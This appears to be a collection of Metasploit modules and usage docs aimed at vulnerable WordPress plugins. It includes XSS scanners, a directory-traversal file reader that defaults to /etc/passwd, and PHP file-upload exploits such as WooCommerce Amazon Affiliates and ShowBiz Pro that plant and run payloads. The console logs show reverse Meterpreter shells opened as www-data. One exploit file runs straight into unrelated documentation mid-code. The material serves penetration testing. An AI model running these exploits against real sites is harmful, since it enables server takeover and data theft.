You can try to change the FILEPATH.") 92 | end 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_thecartpress_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress TheCartPress Plugin XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a authenticated Cross-Site Scripting in TheCartPress Plugin for WordPress, 19 | version 1.3.9 and likely prior in order if the instance is vulnerable. (Tested with TheCartPress 1.3.8.2 version, 20 | but 1.3.9 works). 
21 | }, 22 | 'Author' => 23 | [ 24 | 'High-Tech Bridge', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2015-3302'], 31 | ['EDB', '36860'], 32 | ['WPVDB', '7951'], 33 | ['URL', 'https://www.htbridge.com/advisory/HTB23254'] 34 | ], 35 | 'DisclosureDate' => 'Apr 29 2015' 36 | )) 37 | 38 | register_options( 39 | [ 40 | OptString.new('WP_USER', [true, 'A valid username', nil]), 41 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 42 | ], self.class) 43 | end 44 | 45 | def check 46 | check_plugin_version_from_readme('thecartpress') 47 | end 48 | 49 | def user 50 | datastore['WP_USER'] 51 | end 52 | 53 | def password 54 | datastore['WP_PASSWORD'] 55 | end 56 | 57 | def run_host(ip) 58 | print_status("#{peer} - Trying to login as #{user}") 59 | cookie = wordpress_login(user, password) 60 | if cookie.nil? 61 | print_error("#{peer} - Unable to login as #{user}") 62 | return 63 | end 64 | print_good("#{peer} - Login successful") 65 | 66 | xss = Rex::Text.rand_text_alpha(8) 67 | xss_payload = "\"'>" 68 | 69 | res = send_request_cgi( 70 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 71 | 'vars_get' => { 72 | 'page' => normalize_uri('thecartpress', 'admin', 'AddressEdit.php'), 73 | 'address_name' => xss_payload, 74 | 'firstname' => xss_payload, 75 | 'lastname' => xss_payload, 76 | 'street' => xss_payload, 77 | 'city' => xss_payload, 78 | 'postcode' => xss_payload, 79 | 'email' => xss_payload 80 | }, 81 | 'cookie' => cookie 82 | ) 83 | 84 | unless res && res.body 85 | print_error("#{peer} - Server did not respond in an expected way") 86 | return 87 | end 88 | 89 | if res.code == 200 && res.body =~ /#{xss}/ 90 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"TheCartPress 1.3.9\" plugin for WordPress") 91 | p = store_local('wp_thecartpress.http', 'text/html', res.body, "#{xss}") 92 | print_good("Save in: 
#{p}") 93 | else 94 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 95 | end 96 | end 97 | end 98 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_aprils_super_function_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin April's Super Function Pack XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'April's Super Function Pack' 1.4.7 4 | Homepage: https://wordpress.org/plugins/aprils-super-functions-pack/ 5 | Source Code: https://downloads.wordpress.org/plugin/aprils-super-functions-pack.1.4.7.zip 6 | References: https://wpvulndb.com/vulnerabilities/7068 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.4.7 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_aprils_super_function_xss_scanner 17 | msf auxiliary(wp_aprils_super_function_xss_scanner) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_aprils_super_function_xss_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_aprils_super_function_xss_scanner) > info

       Name: WordPress April's Super Function Pack XSS Scanner
     Module: auxiliary/scanner/http/wp_aprils_super_function_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-01-06

Provided by:
  Unknown
  Roberto Soares Espreto

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module attempts to exploit a Cross-Site Scripting in April's
  Super Function Pack Plugin for WordPress, version 1.4.7 and likely
  prior in order if the instance is vulnerable.

References:
  http://cvedetails.com/cve/2014-100026/
  http://www.osvdb.org/101807
  https://wpvulndb.com/vulnerabilities/7068

msf auxiliary(wp_aprils_super_function_xss_scanner) > set RHOSTS 192.168.1.31
RHOSTS => 192.168.1.31
msf auxiliary(wp_aprils_super_function_xss_scanner) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(wp_aprils_super_function_xss_scanner) > run

[+] 192.168.1.31:80 - Vulnerable to Cross-Site Scripting the "April's Super Function Pack 1.4.7" plugin for WordPress
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_aprils_super_function_xss_scanner) >
```

--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_cp_image_storage_file_read.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress CP Image Store File Read Vulnerability',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in WordPress
        Plugin "CP Image Store with SlideShow" version 1.0.5, allowing to read
        arbitrary files with the web server privileges.
      },
      'References'     =>
        [
          ['EDB', '37559'],
          ['WPVDB', '8094']
        ],
      'Author'         =>
        [
          'Joaquin Ramirez Martinez', # Vulnerability Discovery
          'Roberto Soares Espreto '   # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]),
        OptString.new('WP_USER', [true, 'Username wordpress', nil]),
        OptString.new('WP_PASS', [true, 'Password to logon', nil])
      ], self.class)
  end

  def user
    datastore['WP_USER']
  end

  def password
    datastore['WP_PASS']
  end

  def check
    check_plugin_version_from_readme('cp-image-store', '1.0.6')
  end

  def run_host(ip)

    vprint_status("#{peer} - Trying to login as: #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as: #{user}")
      return
    end

    traversal = "../" * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//

    email = Rex::Text::rand_text_alpha_lower(5) + '@' + Rex::Text::rand_text_alpha_lower(5) + '.com'

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => target_uri.path,
      'vars_get' => {
        'action'          => 'cpis_init',
        'cpis-action'     => 'f-download',
        'purchase_id'     => '1',
        'cpis_user_email' => "#{email}",
        'f'               => "#{traversal}#{filename}"
      },
      'cookie'   => cookie
    )

    if res && res.code == 200

      vprint_status('Downloading file...')
      vprint_line("\n#{res.body}")
      fname = datastore['FILEPATH']

      path = store_loot(
        'cpimagestore.traversal',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
    end
  end
end

--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_eshop_xss_scanner.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress eShop XSS Scanner',
      'Description'    => %q{
        This module attempts to exploit a Cross-Site Scripting in eShop Plugin
        for WordPress, version 6.3.13 and likely prior in order if the instance
        is vulnerable.
      },
      'Author'         =>
        [
          'Ehsan Hosseini',           # Vulnerability Discovery
          'Roberto Soares Espreto '   # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['PACKETSTORM', '133480'],
          ['WPVDB', '8180']
        ],
      'DisclosureDate' => 'Sep 04 2015'
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'A valid password', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('eshop', '6.3.14')
  end

  def user
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def run_host(ip)
    vprint_status("#{peer} - Trying to login as: #{user}:#{password}")
    cookie = wordpress_login(user, password)
    fail_with(Failure::NoAccess, "Unable to login as: #{user}:#{password}") if cookie.nil?

    value = Rex::Text.rand_text_numeric(8)
    xss = "\">"

    data = Rex::MIME::Message.new
    data.add_part('M', nil, nil, 'form-data; name="uptime"')
    data.add_part('', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    data.add_part(xss, 'application/x-php', nil, 'form-data; name="title"')
    data.add_part('yes', nil, nil, 'form-data; name="overwrite"')
    data.add_part('upload File', nil, nil, 'form-data; name="up"')
    post_data = data.to_s

    vprint_status("#{peer} - Sending payload...")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'eshop-downloads.php',
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'cookie'   => cookie
    )

    fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless res

    if res.code == 200 && res.body.include?("#{xss}")
      print_good("#{peer} - Vulnerable to Cross-Site Scripting the eShop 6.3.13 plugin for WordPress")
      p = store_local(
        'eshop.http',
        'text/html',
        res.body,
        value
      )
      print_good("Save in: #{p}")
    else
      print_error("#{peer} - Failed, maybe the target isn't vulnerable.")
    end
  end
end

--------------------------------------------------------------------------------
/documentation/auxiliary/wp_business_intelligent_sqli_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Business Intelligence Lite SQL Injection Scanner.

Application: WordPress Plugin 'Business Intelligence Lite' 1.6.1
Homepage: https://wordpress.org/plugins/wp-business-intelligence-lite/
Source Code: https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip
References: https://wpvulndb.com/vulnerabilities/7879

#### Vulnerable packages*

1.6.1

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use auxiliary/scanner/http/wp_business_intelligent_sqli_scanner
msf auxiliary(wp_business_intelligent_sqli_scanner) > show options

Module options (auxiliary/scanner/http/wp_business_intelligent_sqli_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   SLEEP      7                yes       Calculate the response time (7 is default)
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_business_intelligent_sqli_scanner) > info

       Name: WordPress Business Inteligence Lite Unauthenticated SQLi Scanner
     Module: auxiliary/scanner/http/wp_business_intelligent_sqli_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-04-01

Provided by:
  Jagriti Sahu
  Roberto Soares Espreto

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  SLEEP      7                yes       Calculate the response time (7 is default)
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module attempts to exploit SQL injection in Business
  Intelligence Lite version 1.6.1 for WordPress and likely prior in
  order if the instance is vulnerable.

References:
  https://wpvulndb.com/vulnerabilities/7879
  http://packetstormsecurity.com/files/131228/

msf auxiliary(wp_business_intelligent_sqli_scanner) > set RHOSTS 192.168.1.31
RHOSTS => 192.168.1.31
msf auxiliary(wp_business_intelligent_sqli_scanner) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(wp_business_intelligent_sqli_scanner) > run

[*] 192.168.1.31:80 - Checking host...
[+] 192.168.1.31:80 - Vulnerable to unauthenticated SQL injection in "Business Intelligence Lite 1.6.1" plugin for WordPress
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_business_intelligent_sqli_scanner) >
```

--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WooCommerce Amazon Affiliates Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress WooCommerce Amazon
        Affiliates version 7.0. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress 4.2.1 on Ubuntu
        14.04 Server.
      },
      'Author'         =>
        [
          'Evex_1337',                # Vulnerability Discovery
          'Roberto Soares Espreto '   # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7940'],
          ['URL', 'http://packetstormsecurity.com/files/131629/'],
          ['URL', 'http://research.evex.pw/?vuln=13']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WooCommerce Amazon Affiliates 7.0', {}]],
      'DisclosureDate' => 'Apr 01 2015',
      'DefaultTarget'  => 0)
    )

    register_options(
      [
        OptString.new('KEY', [true, 'A valid key on the target host', 'c125a47cba1e8ec73945dd622d142f79' ])
      ], self.class
    )
  end

  def check # rewrote check method
    release_log_url = normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'plugin.php')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '7.0.1')
  end

  def inject(action)
    key = datastore['KEY']

    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'modules', 'remote_support', 'remote_tunnel.php'),
      'method'    => 'POST',
      'vars_post' => {
        'connection_key' => key,
        'action'         => 'save_file',
        'file'           => '../../index.php',
        'file_content'   => Rex::Text.encode_base64(action)
      }
    )

    if res
      if res.code == 200 && res.body.include?('"status":"valid"') && action == payload.encoded
        print_good("#{peer} - Injecting payload...")
      elsif res.code == 200 && res.body.include?('"status":"valid"') && action != payload.encoded
        print_good("Restored original content.")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not answer')
    end
    return
  end

  def exploit
    inject(payload.encoded)

    print_status("#{peer} - Calling payload...")

    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'index.php') },
      5
    )

    original_content = " use exploit/unix/webapp/wp_reflexgallery_file_upload
msf exploit(wp_reflexgallery_file_upload) > show options

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Reflex Gallery 3.1.3


msf exploit(wp_reflexgallery_file_upload) > info

       Name: WordPress Reflex Gallery Upload Vulnerability
     Module: exploit/unix/webapp/wp_reflexgallery_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-10-22

Provided by:
  TO DO
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   Reflex Gallery 3.1.3

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary
  file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/36374
  http://www.osvdb.org/88853
  https://wpvulndb.com/vulnerabilities/7867

msf exploit(wp_reflexgallery_file_upload) > set RHOST 192.168.0.15
RHOST => 192.168.0.15
msf exploit(wp_reflexgallery_file_upload) > exploit

[*] Started reverse handler on 192.168.0.14:4444
[+] 192.168.0.15:80 - Our payload is at: pKTFvotjaaGW.php. Calling payload...
[*] 192.168.0.15:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.0.15
[*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.15:36912) at 2015-04-16 08:32:55 -0300
[+] Deleted pKTFvotjaaGW.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 7144 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

--------------------------------------------------------------------------------
/documentation/exploits/wp_creativecontactform_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Creative Contact Form 0.9.7 Shell Upload.

Application: WordPress Creative Contact Form
Homepage: https://wordpress.org/plugins/sexy-contact-form
Source Code: https://downloads.wordpress.org/plugin/sexy-contact-form.0.9.7.zip
Active Installs (wordpress.org): 5,000+

#### Vulnerable packages*

0.9.7

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_creativecontactform_file_upload
msf exploit(wp_creativecontactform_file_upload) > show options

Module options (exploit/unix/webapp/wp_creativecontactform_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Creative Contact Form 0.9.7


msf exploit(wp_creativecontactform_file_upload) > info

       Name: WordPress Creative Contact Form Upload Vulnerability
     Module: exploit/unix/webapp/wp_creativecontactform_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-09-22

Provided by:
  Gianni Angelozzi
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   Creative Contact Form 0.9.7

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  Creative Contact Form version 0.9.7. The vulnerability allows for
  arbitrary file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/35057
  http://www.osvdb.org/113669

msf exploit(wp_creativecontactform_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_creativecontactform_file_upload) > run

[*] Started reverse handler on 192.168.1.46:4444
[+] 192.168.1.31:80 - Our payload is at: kyfbCzwa.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40393) at 2015-04-13 18:44:47 -0300
[+] Deleted kyfbCzwa.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 23370 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/exploits/wp_worktheflow_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Work The Flow 2.5.2 Shell Upload.

Application: WordPress Work The Flow File Upload
Homepage: https://wordpress.org/plugins/work-the-flow-file-upload/
Source Code: https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip

#### Vulnerable packages*

2.5.2

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_worktheflow_upload
msf exploit(wp_worktheflow_upload) > show options

Module options (exploit/unix/webapp/wp_worktheflow_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      localhost        yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Work The Flow 2.5.2


msf exploit(wp_worktheflow_upload) > info

       Name: WordPress Work The Flow Upload Vulnerability
     Module: exploit/unix/webapp/wp_worktheflow_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Claudio Viviani
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   Work The Flow 2.5.2

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      localhost        yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  Work The Flow plugin, version 2.5.2. The vulnerability allows for
  arbitrary file upload and remote code execution.

References:
  http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html

msf exploit(wp_worktheflow_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_worktheflow_upload) > exploit

[*] Started reverse handler on 192.168.1.46:4444
[+] 192.168.1.31:80 - Our payload is at: XcHULYXfBVi.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:39966) at 2015-04-12 21:05:13 -0300
[+] Deleted XcHULYXfBVi.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter >
```

--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_showbiz_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress ShowBiz Pro Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        ShowBiz Pro plugin, version 1.7.1 and prior. The vulnerability allows for
        arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef',         # Vulnerability Discovery
          'Roberto Soares Espreto '   # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '35385'],
          ['WPVDB', '7955'],
          ['OSVDB', '115118'],
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Showbiz Pro (showbiz) 1.7.1', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'showbizpro', 'release_log.html')
    # TO DO: Rewrite check. Time sleep now. :)
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '1.7.2')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    payload_zip = Rex::Zip::Archive.new
    payload_zip.add_file('showbiz/' + php_pagename, payload.encoded)

    data = Rex::MIME::Message.new
    data.add_part('showbiz_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"showbiz.zip\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'    => wordpress_url_admin_ajax,
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if res
      if res.code == 200 && res.body.include?('Update in progress')
        register_files_for_cleanup(php_pagename)
        register_files_for_cleanup('../showbiz.zip')
        print_good("#{peer} - Our payload is: #{php_pagename}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(wordpress_url_plugins, 'showbiz', 'temp', 'update_extract', 'showbiz', php_pagename),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'No response or response body, bailing.')
    end
  end
end

--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_social_media_and_share_xss_scanner.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Social Media and Share Icons XSS Scanner',
      'Description'    => %q{
        This module attempts to exploit an Authenticated Cross-Site Scripting in Social
        Media and Share Icons Plugin for WordPress, version 1.1.1.11 and likely prior in order if the
        instance is vulnerable.
      },
      'Author'         => [
        'g0blin',                   # Vulnerability Discovery
        'Roberto Soares Espreto '   # Metasploit Module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['WPVDB', '8231'],
        ['URL', 'https://research.g0blin.co.uk/g0blin-00052/']
      ],
      'DisclosureDate' => 'Nov 22 2015'
    ))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid username', nil]),
        OptString.new('WP_PASS', [true, 'A valid password', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ultimate-social-media-icons', '1.1.1.12')
  end

  def user
    datastore['WP_USER']
  end

  def password
    datastore['WP_PASS']
  end

  def send_xss(cookie, xss)
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'                   => 'updateSrcn7',
        'sfsi_popup_text'          => "'\">",
        'sfsi_Show_popupOn'        => 'everypage',
        'sfsi_Shown_popupOnceTime' => ''
      },
      'cookie'    => cookie
    )

    if res && res.code == 200 && res.body.include?('success')
      vprint_status("#{peer} - Sending payload with success.")
      return true
    else
      print_error("#{peer} - Not triggered XSS.")
      return nil
    end
  end

  def run_host(ip)
    xss = Rex::Text.rand_text_numeric(8)
    vprint_status("#{peer} - Trying to login as: #{user}")
    cookie = wordpress_login(user, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil?

    fail_with(Failure::Unknown, "#{peer} - Unable to send xss") if send_xss(cookie, xss).nil?

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'sfsi-options'
      },
      'cookie'   => cookie
    )

    if res && res.code == 200 && res.body.include?("#{xss}")
